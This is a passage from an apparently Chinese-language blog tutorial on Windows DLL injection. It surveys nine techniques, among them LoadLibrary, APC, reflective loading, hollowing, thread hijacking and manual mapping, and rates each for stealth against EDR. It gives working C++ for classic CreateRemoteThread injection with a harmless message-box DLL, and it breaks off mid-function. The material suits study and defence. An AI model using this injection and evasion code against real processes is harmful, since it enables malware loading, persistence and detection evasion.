        <span class="token function">MessageBoxA</span><span class="token punctuation">(</span><span class="token constant">NULL</span><span class="token punctuation">,</span> <span class="token string">"HelloWorld DLL Loaded!\n DLL_THREAD_ATTACH"</span><span class="token punctuation">,</span> <span class="token string">"HelloWorld"</span><span class="token punctuation">,</span> MB_OK <span class="token operator">|</span> MB_ICONINFORMATION<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">break</span><span class="token punctuation">;</span>

    <span class="token keyword">case</span> DLL_THREAD_DETACH<span class="token operator">:</span>
        <span class="token function">MessageBoxA</span><span class="token punctuation">(</span><span class="token constant">NULL</span><span class="token punctuation">,</span> <span class="token string">"HelloWorld DLL Unloaded!\n DLL_THREAD_DETACH"</span><span class="token punctuation">,</span> <span class="token string">"HelloWorld"</span><span class="token punctuation">,</span> MB_OK <span class="token operator">|</span> MB_ICONINFORMATION<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">break</span><span class="token punctuation">;</span>

    <span class="token keyword">case</span> DLL_PROCESS_DETACH<span class="token operator">:</span>
        <span class="token function">MessageBoxA</span><span class="token punctuation">(</span><span class="token constant">NULL</span><span class="token punctuation">,</span> <span class="token string">"HelloWorld DLL Unloaded!\n DLL_PROCESS_DETACH"</span><span class="token punctuation">,</span> <span class="token string">"HelloWorld"</span><span class="token punctuation">,</span> MB_OK <span class="token operator">|</span> MB_ICONINFORMATION<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">break</span><span class="token punctuation">;</span>

    <span class="token punctuation">&#125;</span>
    <span class="token keyword">return</span> TRUE<span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span></code></pre>
<p>如果你會在虛擬機測試的話，記得先去<strong>屬性&gt;C&#x2F;cpp&gt;程式碼產生</strong> 將執行階段程式庫改成 “多執行續 (&#x2F;MT)” 的<strong>靜態連結</strong>方式，避免執行時出現找不到dll的訊息。<br><img src="/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/20250609174423.png"></p>
<p>然後進行建置方案，就可以看到你的第一個DLL了 !</p>
<p>我們可以透過 <a target="_blank" rel="noopener" href="https://github.com/hasherezade/pe-bear">PEBear</a> 來觀察這一個 dll 檔案，就能發現剛剛寫入的 SayHello 已經在導出函數表了。<br><img src="/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/20250609175432.png"></p>
<p>有了食譜，現在需要一位廚師 : rundll32.exe 。他是Windows 系統中的一個核心工具，使用戶在不直接啟動 DLL 的情況下，執行 DLL 內部的特定功能。Rundll32有兩個版本，分別對應至64位元與32位元 :</p>
<ul>
<li><code>C:\Windows\System32\rundll32.exe</code> : 64位元</li>
<li><code>C:\Windows\SysWOW64\rundll32.exe</code> : 32位元</li>
</ul>
<p>使用方法</p>
<pre class="language-powershell" data-language="powershell"><code class="language-powershell">rundll32<span class="token punctuation">.</span>exe DLL名稱<span class="token punctuation">,</span>函數名稱 <span class="token punctuation">[</span>參數<span class="token punctuation">]</span></code></pre>

<p>若要將我們的 dll 執行，僅用以下命令 :</p>
<pre class="language-powershell" data-language="powershell"><code class="language-powershell">C:\Windows\System32\rundll32<span class="token punctuation">.</span>exe dllHelloWorld<span class="token punctuation">.</span>dll<span class="token punctuation">,</span>SayHello</code></pre>
<p><img src="/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/20250611185232.png"><br>輸入後可以看到一些視窗，我們觀察它的規律 :</p>
<ol>
<li>首先可以看到 <code>DLL_PROCESS_ATTACH</code> 被觸發</li>
<li>接下來數個 <code>DLL_THREAD_ATTACH</code> 出現</li>
<li>“SayHello!” 視窗出現 </li>
<li>數個 <code>DLL_THREAD_DETACH</code> 出現，數量等於 <code>DLL_THREAD_ATTACH</code>。(可能會早於”SayHello!” )</li>
<li>最後 <code>DLL_PROCESS_DETACH</code> 出現代表該程式結束</li>
</ol>
<p>到這邊，我們就大致理解 DLL 的運作原理與實作方法了 !</p>
<hr>
<h1 id="DLL-注入技術摘要"><a href="#DLL-注入技術摘要" class="headerlink" title="DLL 注入技術摘要"></a>DLL 注入技術摘要</h1><p>這邊會講一下目前我找到的 DLL 注入技術的分類與一些特性，而其實作的部分會放在之後的文章中。</p>
<ul>
<li>LoadLibrary</li>
<li>QueueUserAPC</li>
<li>Reflective DLL Injection</li>
<li>SetWindowsHookEx</li>
<li>Thread Context</li>
<li>Manual Mapping</li>
<li>AppInit_DLLs</li>
<li>AppCertDLLs</li>
<li>DLL Hollowing</li>
</ul>
<p>當然，還有不少是沒有寫在這邊的注入技術，若之後有研究的也會放進來。</p>
<h3 id="LoadLibrary"><a href="#LoadLibrary" class="headerlink" title="LoadLibrary"></a>LoadLibrary</h3><p>POC : <a href="#LoadLibrary-%E5%AF%A6%E4%BD%9C">LoadLibrary 實作</a></p>
<p>難度 : ★<br>隱匿度：★</p>
<p>算是最經典的傳統注入手法，其核心思想是在<strong>目標行程配置記憶體並寫入 DLL 路徑</strong>，再由**遠端執行緒呼叫 LoadLibrary 。</p>
<p><strong>流程 :</strong></p>
<ol>
<li>找到目標 PID。</li>
<li>取得可寫入權限的 HANDLE。</li>
<li>寫入 DLL 路徑字串在目標記憶體。</li>
<li>以 <code>CreateRemoteThread</code> 建立遠端執行緒，執行緒入口設定為 <code>LoadLibraryA/W</code>，引數即 DLL 路徑字串位置。</li>
</ol>
<p>優點是簡單、相容性高；缺點則是所有 API 呼叫都可被 EDR 攔截，且 DLL 必須落地硬碟，產生 IOC。</p>
<h3 id="QueueUserAPC"><a href="#QueueUserAPC" class="headerlink" title="QueueUserAPC"></a>QueueUserAPC</h3><p>難度 : ★★<br>隱匿度：★★★</p>
<p>APC（Asynchronous Procedure Call,異步過程調用）允許將回呼函式(Callback) 排入某個特定執行緒的 APC 佇列，該執行緒可在進入<strong>警醒狀態（Alertable state）</strong> 時執行其中被排入佇列的 Callback。典型手法是將 <strong>LoadLibrary</strong> 函數地址與惡意DLL路徑作為參數排到目標執行緒的APC佇列，誘使其在適當時機載入DLL。</p>
<p><strong>流程 :</strong></p>
<ol>
<li>找到目標執行緒 TID ( 可用 Thread32First&#x2F;Thread32Next )，<code>OpenThread</code> 取得 HANDLE。</li>
<li>使用 <code>QueueUserAPC</code> 將 APC 請求插入該執行緒的隊列中，可以指定參數為惡意DLL路徑或是自定義shellcode函數地址。</li>
<li>當執行緒之後呼叫 <code>SleepEx</code>, <code>WaitForSingleObjectEx</code>（alertable 版本）等 API 時，就會執行排隊的 APC。</li>
</ol>
<p>如果無法確定執行緒何時警醒，有幾個常見辦法 :</p>
<ul>
<li>第一步時就找已在 <code>Alertable</code> 的 Thread </li>
<li>強制使目標執行緒進入等待狀態</li>
<li>創建一個暫停的新執行緒僅為執行APC（ Early Bird ）。</li>
</ul>
<p>由於不需要創建新執行緒較為隱匿，且可以指定任意執行緒執行注入任務，對同步和執行緒控制有一定優勢。<br>但若目標執行緒從不進入 alertable wait，注入永遠不會觸發。常見改進包括自行發送 <code>NtTestAlert</code> 或強制呼叫 alertable wait，以提高命中率。</p>
<h3 id="Reflective-DLL-Injection"><a href="#Reflective-DLL-Injection" class="headerlink" title="Reflective DLL Injection"></a>Reflective DLL Injection</h3><p>難度 : ★★★<br>隱匿度：★★★</p>
<p>注入端只需將整個 DLL blob 寫入目標記憶體，並啟動執行緒指向 <code>ReflectiveLoader</code>。整個過程不落磁碟，也不向 PEB 的 Module List 註冊，因此可以逃過基於文件或模組列表的偵測。</p>
<p><strong>流程 :</strong></p>
<ol>
<li>將整顆反射式 DLL blob 以 <code>WriteProcessMemory</code>寫入目標記憶體。</li>
<li><code>CreateRemoteThread</code>（或 hijack thread）把 RIP 指到 <code>ReflectiveLoader</code>。</li>
<li>Loader 解析本身結構 → <code>VirtualAlloc</code> 申請連續區段 → 重定位、匯入解析 → 跳進 <code>DllMain</code>。</li>
</ol>
<p>缺點是需自行維護支援各種架構如 x86、x64、不同 Windows 版本及 TLS、SEH 等自製 Loader，開發成本極高。</p>
<h3 id="SetWindowsHookEx"><a href="#SetWindowsHookEx" class="headerlink" title="SetWindowsHookEx"></a>SetWindowsHookEx</h3><p>難度 : ★<br>隱匿度：★★</p>
<p>利用 Windows 提供的訊息掛鉤機制，開發者撰寫含 <strong>HookProc</strong> 的 DLL，呼叫 <code>SetWindowsHookEx</code>（如 <code>WH_GETMESSAGE</code>, <code>WH_KEYBOARD_LL</code>）後，系統會自動把 DLL 注入指定執行緒&#x2F;行程。</p>
<p><strong>流程 :</strong></p>
<ol>
<li>編寫導出 <code>HookProc</code> 的 DLL。</li>
<li>以 <code>SetWindowsHookEx(WH_GETMESSAGE, … , hMod, tid)</code> 對目標執行緒安裝。</li>
<li>系統自動將 DLL 映射進該執行緒所屬行程。</li>
</ol>
<p>因屬常見 API，在惡意程式掃描時的風險分數較低；不過它只對含 GUI 且有訊息迴圈的行程成立，像是對服務或 console app 無效。</p>
<h3 id="AppInit-DLLs"><a href="#AppInit-DLLs" class="headerlink" title="AppInit_DLLs"></a>AppInit_DLLs</h3><p>難度 : ★<br>隱匿度：★</p>
<p>Windows 為了方便系統層延伸而提供的<a target="_blank" rel="noopener" href="https://learn.microsoft.com/zh-tw/windows/win32/dlls/secure-boot-and-appinit-dlls">機制</a> 。載入 <strong>user32.dll</strong> （幾乎所有 GUI 應用）都會讀取該機<strong>註冊表</strong>指定的 DLL。不過從 Windows 7 開始需手動設 <code>LoadAppInit_DLLs=1</code>( 預設為 0 )，且用 <code>RequireSignedAppInit_DLLs=1</code> 強制驗證簽章。</p>
<p><strong>流程 :</strong></p>
<ol>
<li>修改 <code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs</code>，寫入 DLL 路徑。</li>
<li>設 <code>LoadAppInit_DLLs</code>＝1（必要時 <code>RequireSignedAppInit_DLLs</code>＝0）。</li>
<li>每次程序載入 user32.dll 時，Windows Loader 自動呼叫 <code>LoadLibrary</code> 載入列舉 DLL。</li>
</ol>
<p>優點是一次設定即可<strong>全系統注入</strong>，並在<strong>重開機後持續生效</strong>；缺點是特徵極明顯，也最容易被發現。</p>
<h3 id="AppCertDLLs"><a href="#AppCertDLLs" class="headerlink" title="AppCertDLLs"></a>AppCertDLLs</h3><p>難度 : ★★<br>隱匿度：★★</p>
<p>跟上面那個很像，此機制位於 <strong>Session Manager</strong> 階段，任何呼叫 <code>CreateProcess</code>、<code>WinExec</code> 的程式都會先載入該機<strong>註冊表</strong>指定的 DLL。</p>
<p><strong>流程 :</strong></p>
<ol>
<li>修改 <code>HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDLLs</code>，寫入 DLL 路徑。</li>
<li>任何程式呼叫 CreateProcess() 時，Windows 將先載入指定 DLL，再繼續行程建立流程。</li>
</ol>
<p>它比 AppInit_DLLs 準確，僅針對要產生子行程的流程，常見於防毒動態攔截或家長監控軟體。缺點類似 AppInit_DLLs：需寫系統註冊碼並在現代 Windows 時會受簽章限制；且 GUI-only 應用內部不呼叫 CreateProcess 時不會觸發。</p>
<h3 id="DLL-Hollowing"><a href="#DLL-Hollowing" class="headerlink" title="DLL Hollowing"></a>DLL Hollowing</h3><p>難度 : ★★★★<br>隱匿度：★★★★</p>
<p>攻擊者將<strong>合法的 DLL</strong> 載入行程的記憶體空間，然後用惡意程式碼<strong>覆寫 DLL</strong> 的部分區段。</p>
<p><strong>流程 :</strong></p>
<ol>
<li><code>LoadLibrary</code> 合法 DLL（如 kernel32.dll 副本，可以是未使用或犧牲用）。</li>
<li>以 <code>VirtualProtect</code> 或直接修改可寫區段，把原 <code>.text</code> 覆寫為惡意 shellcode；或刪除 PE header 並填入新映像。</li>
<li>覆寫 <code>AddressOfEntryPoint</code> 或導出函式指標，導向自有程式碼。</li>
</ol>
<p>因它並非簡單地向程序中新增一個惡意 DLL，而是劫持並重新利用已經載入的合法 DLL，所以可以在看似正常且受信任的函式庫中隱藏惡意活動，具有極高的隱匿性。</p>
<h3 id="Thread-Context"><a href="#Thread-Context" class="headerlink" title="Thread Context"></a>Thread Context</h3><p>難度 : ★★★★<br>隱匿度：★★★★</p>
<p>由於創建新執行緒很明顯又容易被偵測，所以該方法<strong>暫停現有執行緒</strong>並修改 EIP 指向惡意程式碼，</p>
<p><strong>流程 :</strong></p>
<ol>
<li>開啟目標程序，再用 <code>OpenThread</code> 取得其中一條現有執行緒的控制權。</li>
<li>在目標程序分配可執行記憶體，然後用寫入 shellcode 或一個小型 stub（這個 stub 會呼叫 <code>LoadLibraryA</code> 並傳入 DLL 路徑）。</li>
<li>暫停這條被選中的執行緒，取得該執行緒的暫存器狀態。</li>
<li>ㄐ將該暫存器的 EIP 指向 shellcode 或 stub 位置。</li>
<li>用 <code>SetThreadContext(threadHijacked, &amp;ctx)</code> 寫回修改後的 Thread Context。</li>
<li>恢復執行，開始執行你注入的程式碼並載入 DLL，最後再跳回原本的指令指標繼續執行。</li>
</ol>
<p>雖然僅是執行緒短暫暫停，極難與注入行為做關聯而觸發規則；但需要需處理堆疊、同步與架構差異，實作門檻高。</p>
<h3 id="Manual-Mapping"><a href="#Manual-Mapping" class="headerlink" title="Manual Mapping"></a>Manual Mapping</h3><p>難度 : ★★★★<br>隱匿度：★★★★</p>
<p>既然 Windows 提供的 <code>LoadLibrary</code> 和 <code>CreateRemoteThread</code> 都是各個防毒軟體的重點關注 API ，本方法<strong>手工</strong>將DLL的內容載入目標行程記憶體中，並自行完成需要的修復工作（例如重配置匯入表和重定位），而<strong>不透過</strong> Windows API。</p>
<p><strong>流程 :</strong></p>
<ol>
<li>計算欲注入PE&#x2F;DLL檔大小，在目標配置足夠記憶體空間</li>
<li>透過 <code>WriteProcessMemory</code> 將完整的DLL檔原始數據寫入這塊記憶體中</li>
<li>由注入程序在目標行程內設計<strong>自行執行映射流程</strong>(計算新的基址偏移、重定位表修正至 DLL 的絕對地址、規劃 IAT 函數位置等等……)</li>
</ol>
<p>有點類似於之前在鐵人賽寫的內嵌補丁<a target="_blank" rel="noopener" href="https://ithelp.ithome.com.tw/articles/10301353">這一篇</a>。(示意圖)<br><img src="/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/20250615024505.png"></p>
<p>這種方法本質上屬於將可執行PE檔案直接寫入目標進程並啟動執行，又稱 <strong>PE 注入 (PE Injection)</strong>。與經典方法相比，手動映射<strong>不需要將惡意DLL存放到磁碟</strong>，因此隱蔽性更高，但也非常麻煩。</p>
<h1 id="注入技術實作"><a href="#注入技術實作" class="headerlink" title="注入技術實作"></a>注入技術實作</h1><p>在理解這些注入技術的特性之後，我們來嘗試實作看看這些方法。在開始之前，先提供一些有用的函數使我們開發方便一點。</p>
<p>isUserAdmin : 這個函數來自於<a target="_blank" rel="noopener" href="https://github.com/cocomelonc/mdmz_book">MDMZ_Book</a>，用於測試是否具有系統管理員權限。</p>
<pre class="language-cpp" data-language="cpp"><code class="language-cpp"><span class="token keyword">bool</span> <span class="token function">isUserAdmin</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>	<span class="token comment">// from MDMZ_Book.pdf</span>
	<span class="token keyword">bool</span> isElevated <span class="token operator">=</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
	HANDLE token<span class="token punctuation">;</span>
	TOKEN_ELEVATION elev<span class="token punctuation">;</span>
	DWORD size<span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">OpenProcessToken</span><span class="token punctuation">(</span><span class="token function">GetCurrentProcess</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
		TOKEN_QUERY<span class="token punctuation">,</span> <span class="token operator">&amp;</span>token<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
		<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">GetTokenInformation</span><span class="token punctuation">(</span>token<span class="token punctuation">,</span> TokenElevation<span class="token punctuation">,</span>
			<span class="token operator">&amp;</span>elev<span class="token punctuation">,</span> <span class="token keyword">sizeof</span><span class="token punctuation">(</span>elev<span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token operator">&amp;</span>size<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
			isElevated <span class="token operator">=</span> elev<span class="token punctuation">.</span>TokenIsElevated<span class="token punctuation">;</span>
		<span class="token punctuation">&#125;</span>
	<span class="token punctuation">&#125;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span>token<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
		<span class="token function">CloseHandle</span><span class="token punctuation">(</span>token<span class="token punctuation">)</span><span class="token punctuation">;</span>
		token <span class="token operator">=</span> <span class="token constant">NULL</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>
	<span class="token keyword">return</span> isElevated<span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span></code></pre>
<hr>
<p>getDLLPath : 用於取得目前 dll 檔案位置。</p>
<pre class="language-cpp" data-language="cpp"><code class="language-cpp"><span class="token keyword">bool</span> <span class="token function">getDLLPath</span><span class="token punctuation">(</span><span class="token keyword">wchar_t</span><span class="token operator">*</span> DLLPath<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
	HMODULE hModule <span class="token operator">=</span> <span class="token constant">NULL</span><span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">GetModuleHandleEx</span><span class="token punctuation">(</span>GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS<span class="token punctuation">,</span> <span class="token punctuation">(</span>LPCTSTR<span class="token punctuation">)</span><span class="token operator">&amp;</span>getDLLPath<span class="token punctuation">,</span> <span class="token operator">&amp;</span>hModule<span class="token punctuation">)</span><span class="token punctuation">)</span>
	<span class="token punctuation">&#123;</span>
		<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">GetModuleFileName</span><span class="token punctuation">(</span>hModule<span class="token punctuation">,</span> DLLPath<span class="token punctuation">,</span> MAX_PATH<span class="token punctuation">)</span> <span class="token operator">></span> <span class="token number">0</span><span class="token punctuation">)</span>
		<span class="token punctuation">&#123;</span>
			<span class="token keyword">return</span> <span class="token boolean">true</span><span class="token punctuation">;</span>
		<span class="token punctuation">&#125;</span>
	<span class="token punctuation">&#125;</span>
	<span class="token keyword">return</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span></code></pre>
<h2 id="LoadLibrary-實作"><a href="#LoadLibrary-實作" class="headerlink" title="LoadLibrary 實作"></a>LoadLibrary 實作</h2><h3 id="方法說明"><a href="#方法說明" class="headerlink" title="方法說明"></a>方法說明</h3><p>上面提到，這種注入方法的核心思想是在目標行程配置記憶體並<strong>寫入 DLL 路徑</strong>，再由<strong>遠端執行緒呼叫 LoadLibrary 載入</strong>。所以我們需要以下步驟來達成目標 :</p>
<ol>
<li>取得目標 PID。</li>
<li><code>OpenProcess</code> 取得可寫入權限的 HANDLE。</li>
<li>以 <code>VirtualAllocEx</code> 在目標記憶體中配置空間，並以 <code>WriteProcessMemory</code> 寫入 DLL 路徑字串。</li>
<li>以 <code>CreateRemoteThread</code> 建立遠端執行緒，執行緒入口設定為 <code>LoadLibraryA/W</code>，引數即前述字串位址。</li>
</ol>
<p>以下將省去異常處理，先用程式碼了解流程( 等等會有實做 ) : </p>
<p>首先，注入器必須使用 OpenProcess API 並具備適當的存取權限（包括 PROCESS_ALL_ACCESS 權限）來<strong>取得目標程序的句柄</strong>。此句柄使注入器能與目標程序互動，包括記憶體配置、寫入及執行緒建立。</p>
<pre class="language-cpp" data-language="cpp"><code class="language-cpp"><span class="token keyword">bool</span> <span class="token function">DLLinject</span><span class="token punctuation">(</span>DWORD pid<span class="token punctuation">,</span> <span class="token keyword">const</span> <span class="token keyword">wchar_t</span><span class="token operator">*</span> dllPath<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
	HANDLE hProcess <span class="token operator">=</span> <span class="token function">OpenProcess</span><span class="token punctuation">(</span>PROCESS_ALL_ACCESS<span class="token punctuation">,</span> FALSE<span class="token punctuation">,</span> pid<span class="token punctuation">)</span><span class="token punctuation">;</span></code></pre>
<p>接下來為了使 LoadLibrary 函數以 dll 文件位置作為引數，故需要將 dll 文件位置先<strong>寫入目標記憶體</strong>。</p>
<pre class="language-cpp" data-language="cpp"><code class="language-cpp"><span class="token comment">// 在目標記憶體中配置空間，大小為 [dllPath + 1]</span>
LPVOID pDllPath <span class="token operator">=</span> <span class="token function">VirtualAllocEx</span><span class="token punctuation">(</span>hProcess<span class="token punctuation">,</span> <span class="token constant">NULL</span><span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token function">wcslen</span><span class="token punctuation">(</span>dllPath<span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token number">1</span><span class="token punctuation">)</span> <span class="token operator">*</span> <span class="token keyword">sizeof</span><span class="token punctuation">(</span><span class="token keyword">wchar_t</span><span class="token punctuation">)</span><span class="token punctuation">,</span> MEM_COMMIT<span class="token punctuation">,</span> PAGE_READWRITE<span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token comment">// 以 WriteProcessMemory 寫入 DLL 路徑字串</span>
SIZE_T bytesWritten<span class="token punctuation">;</span>
<span class="token function">WriteProcessMemory</span><span class="token punctuation">(</span>hProcess<span class="token punctuation">,</span> pDllPath<span class="token punctuation">,</span> dllPath<span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token function">wcslen</span><span class="token punctuation">(</span>dllPath<span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token number">1</span><span class="token punctuation">)</span> <span class="token operator">*</span> <span class="token keyword">sizeof</span><span class="token punctuation">(</span><span class="token keyword">wchar_t</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token operator">&amp;</span>bytesWritten<span class="token punctuation">)</span></code></pre>
<p>由於我們使用 LoadLibrary 位於 Kernel32.dll 中，所以尋找目標程序中 LoadLibrary 函數的<strong>位址</strong>。</p>
<pre class="language-cpp" data-language="cpp"><code class="language-cpp"><span class="token comment">// 取用 Kernel32.dll</span>
HMODULE hKernel32 <span class="token operator">=</span> <span class="token function">GetModuleHandleW</span><span class="token punctuation">(</span>L<span class="token string">"Kernel32.dll"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token comment">// 取得 Kernel32.dll!LoadLibraryW 函數位置</span>
LPTHREAD_START_ROUTINE pLoadLibraryW <span class="token operator">=</span> <span class="token generic-function"><span class="token function">reinterpret_cast</span><span class="token generic class-name"><span class="token operator">&lt;</span>LPTHREAD_START_ROUTINE<span class="token operator">></span></span></span><span class="token punctuation">(</span><span class="token function">GetProcAddress</span><span class="token punctuation">(</span>hKernel32<span class="token punctuation">,</span> <span class="token string">"LoadLibraryW"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span></code></pre>
<p>最終利用 CreateRemoteThread 在目標程序中<strong>建立一個新執行緒</strong>，該執行緒以 DLL 路徑作為參數執行 LoadLibrary 函數。 CreateRemoteThread 函數將 LoadLibrary 的位址作為執行緒啟動例程，並將包含 DLL 路徑的已分配記憶體作為參數。 這迫使目標程序載入並執行惡意 DLL，完成注入過程。</p>
<pre class="language-cpp" data-language="cpp"><code class="language-cpp">HANDLE hThread <span class="token operator">=</span> <span class="token function">CreateRemoteThread</span><span class="token punctuation">(</span>hProcess<span class="token punctuation">,</span> <span class="token constant">NULL</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> pLoadLibraryW<span class="token punctuation">,</span> pDllPath<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token constant">NULL</span><span class="token punctuation">)</span><span class="token punctuation">;</span></code></pre>
<p>最後等待執行緒結束並釋放資源。</p>
<pre class="language-cpp" data-language="cpp"><code class="language-cpp">	<span class="token function">WaitForSingleObject</span><span class="token punctuation">(</span>hThread<span class="token punctuation">,</span> INFINITE<span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token function">VirtualFreeEx</span><span class="token punctuation">(</span>hProcess<span class="token punctuation">,</span> pDllPath<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> MEM_RELEASE<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">CloseHandle</span><span class="token punctuation">(</span>hThread<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">CloseHandle</span><span class="token punctuation">(</span>hProcess<span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token keyword">return</span> <span class="token boolean">true</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
</code></pre>

<hr>
<h3 id="DEMO"><a href="#DEMO" class="headerlink" title="DEMO"></a>DEMO</h3><p>理解了該注入方法的流程後，我們來設計一個可以對目標 PID 進行注入的 DLL :</p>
<ol>
<li>現在我們在<code>DLL_PROCESS_ATTACH</code>加上使 DLL 被呼叫時<strong>輸出他所在程序名稱</strong>的功能。</li>
<li>添加 <code>StartInjection</code> 函數，可以利用 rundll32 <strong>指定參數</strong>來注入目標 PID。</li>
<li>記得要使用<strong>管理員權限</strong>來進行注入。</li>
</ol>
<p>pch.h</p>
<pre class="language-cpp" data-language="cpp"><code class="language-cpp"><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">ifndef</span> <span class="token expression">PCH_H</span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">define</span> <span class="token macro-name">PCH_H</span></span>

<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">"framework.h"</span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;windows.h></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">"string"</span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;psapi.h></span></span>

<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">endif</span> <span class="token comment">//PCH_H</span></span></code></pre>
<p>main.cpp</p>
<pre class="language-cpp" data-language="cpp"><code class="language-cpp"><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">"pch.h"</span></span>

<span class="token comment">// 取得 DLL 檔案路徑</span>
<span class="token keyword">bool</span> <span class="token function">getDLLPath</span><span class="token punctuation">(</span><span class="token keyword">wchar_t</span><span class="token operator">*</span> DLLPath<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
	HMODULE hModule <span class="token operator">=</span> <span class="token constant">NULL</span><span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">GetModuleHandleEx</span><span class="token punctuation">(</span>GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS<span class="token punctuation">,</span> <span class="token punctuation">(</span>LPCTSTR<span class="token punctuation">)</span><span class="token operator">&amp;</span>getDLLPath<span class="token punctuation">,</span> <span class="token operator">&amp;</span>hModule<span class="token punctuation">)</span><span class="token punctuation">)</span>
	<span class="token punctuation">&#123;</span>
		<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">GetModuleFileName</span><span class="token punctuation">(</span>hModule<span class="token punctuation">,</span> DLLPath<span class="token punctuation">,</span> MAX_PATH<span class="token punctuation">)</span> <span class="token operator">></span> <span class="token number">0</span><span class="token punctuation">)</span>
		<span class="token punctuation">&#123;</span>
			<span class="token keyword">return</span> <span class="token boolean">true</span><span class="token punctuation">;</span>
		<span class="token punctuation">&#125;</span>
	<span class="token punctuation">&#125;</span>
	<span class="token keyword">return</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token comment">// DLL 注入函數</span>
<span class="token keyword">bool</span> <span class="token function">DLLinject</span><span class="token punctuation">(</span>DWORD pid<span class="token punctuation">,</span> <span class="token keyword">const</span> <span class="token keyword">wchar_t</span><span class="token operator">*</span> dllPath<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
	HANDLE hProcess <span class="token operator">=</span> <span class="token function">OpenProcess</span><span class="token punctuation">(</span>PROCESS_ALL_ACCESS<span class="token punctuation">,</span> FALSE<span class="token punctuation">,</span> pid<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span>hProcess <span class="token operator">==</span> <span class="token constant">NULL</span><span class="token punctuation">)</span>
	<span class="token punctuation">&#123;</span>
		<span class="token keyword">return</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>

